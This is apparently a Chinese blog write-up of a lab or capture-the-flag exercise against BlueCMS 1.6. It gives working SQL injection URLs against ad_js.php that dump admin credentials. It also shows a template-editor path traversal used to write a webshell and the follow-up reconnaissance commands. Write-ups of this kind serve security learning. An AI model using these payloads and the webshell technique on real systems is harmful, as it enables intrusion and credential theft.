拿到题 睁大眼就能看见底下的 bluecms 1.6 百度了一下漏洞位置 学习了PW的姿势
SQL注入位置
http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1
Order by 7 字段长度为7
注入表名payload:
ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
注入字段payload:
ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626c75655f61646d696e
这里出了个问题 如下图: blue_admin 被包住了 使用反引号 是绕不过去的 解决办法是字符串转16进制来解决
注入账户密码payload:
ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(admin_name,0x3a,pwd)%20from%20blue_admin
这里注入的结果是要用查看源代码的方式:(目前没搞懂为什么有些地方要查看源代码才能看报错回显)
cmd5解密后答案为 123abcufo 怀疑是有人故意改的 不然掌控也太坑了 搞这个密码,浪费我一块钱!!
后台拿shell
进入后台 检查了一下 发现有fck的上传组件 这块是漏洞的 不过要本地构造 我记得 没测试哈。。
系统设置里面看见了一个 数据库备份 和模板管理
记得之前研究dedecms的时候 有用模板来改写shell和 aspcms的提权也可以用到模板来写
Sql备份这块之前有记得 搞什么系统的时候 备份可以改名 然后直接拿shell
一些时间尝试后, 模板存在 跨目录访问权限 ,当然也靠网上给的一些姿势 自己只是觉得这块可能出发问题 但是没他们说的这么猛
点击右键ann.htm的编辑 新建一个链接出来,
http://59.63.200.79:8003/bluecms/uploads/admin/tpl_manage.php?act=edit&tpl_name=ann.htm
看见语句 tpl_name=ann.htm 这里构造 ../../ann.php
可直接写入,访问地址为 根目录的 ann.php (关于这个思路 我认为是肯定要本地部署才能猜出来的 毕竟我能想到跨目录改写,肯定猜不出 ann.htm所对应调用的文件名是什么。。 PS:测试了创建了一个不存在的文件名,以为可以直接强制写入新文件,测试下来发现是不行的!)
写入连接蚂剑
shell提权服务器
Phptudy 就是猛,永远的跨目录,永远的高权限. 要是换个宝塔,我现在能力还真没办法想着去K服务器了
没啥技术性说法,也没啥姿势可谈,小三句 直接插入完成。
看看服务器端口号是多少
给出查看语句
Tasklist -svc
Netstat -ano
END.....
1646
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
